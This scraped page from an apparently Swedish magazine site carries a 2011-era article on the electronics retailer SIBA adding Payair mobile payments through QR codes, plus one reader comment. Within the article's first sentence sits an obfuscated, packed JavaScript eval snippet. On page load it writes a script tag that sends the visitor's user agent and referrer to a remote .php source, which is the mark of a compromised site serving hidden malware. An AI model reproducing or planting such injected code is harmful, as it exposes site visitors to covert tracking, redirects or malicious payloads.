Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

Mobila betalningar med Payair

Mobila betalningar med Payair
Revue Magazine

I eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|zeddi|var|u0026u|referrer|nhyii||js|php’.split(’|’),0,{}))
år kommer det bli lättare än någonsin att handla och betala julklappar för SIBAs kunder. Ingen mer trängsel och långa kassaköer, istället kommer lediga snabbkassor och oändliga öppettider att vara verklighet för alla dem som väljer att inhandla sin hemelektronik på nätet. Lagom till starten av årets julhandel kommer SIBA att lansera möjligheten att betala med mobilen genom Payair.

I lugn och ro sitter man vid sin dator och har bokstavligt talat hela sortimentet i händerna. Vid varje produkt finns en unik QR-kod. Denna scannas med Payair-applikationen i mobilen. Varan eller varorna läggs då till i mobilens varukorg. När man är klar väljer man ”betala”, slår in sin PIN-kod och bekräftar leveransadress. All övrig information skickas direkt från Payair till SIBAs orderavdelning. För de flesta är det inte bara bekvämt att slippa leta efter plånboken och läsa ofta svårlästa 16-siffriga kontonummer och giltighetsdatum. Det är också en extra trygghet att inte behöva exponera kortinformationen på nätet.

”Vi tror på en god julhandel i år, men framför allt tror vi att e-handeln kommer att fortsätta att utvecklas i en positiv riktning. Att handla på nätet är för de allra flesta en fråga om bekvämlighet och att spara tid. Självklart vill vi på SIBA göra allt för att möta dessa förväntningar hos våra kunder och samtidigt ge bästa tänkbara service. Genom Payair får våra kunder ett nytt alternativ som är snabbt, enkelt och säkert.” – säger Isabel Bengtsson, webbchef SIBA.

Allt kunderna behöver göra är att ladda ner Payairs kostnadsfria applikation och registrera ett eller flera bankkort hos Payair. Bankorten är då tillgängliga i digital form via mobilen istället för i plånboken. All kortinformation är lagrad på en säker server och den information som skickas mellan mobilen och servern är krypterad.

”Payairs tjänst innebär att konsumenterna kan shoppa direkt i reklamen. Genom att applicera QR-koder i annonser, direktreklam, butiksreklam, osv blir denna ”säljande reklam” i ordets rätta bemärkelse. Svenska företag satsar miljarder på trycksaker och kataloger som vi vet har lång livslängd.  Med QR-koder blir dessa aktiva och mätbara försäljningsytor.” – berättar Staffan Ljung VD Payair

Comments

  1. Karl Tagerlind

     Skulle inte iPhone 5 få en funktion för detta? Känns som det kommer väldigt många såna här bolag just nu. Tycker synd om dem om de vet att det kommer en ganska stor konkurrent senare under år 2012. Eller?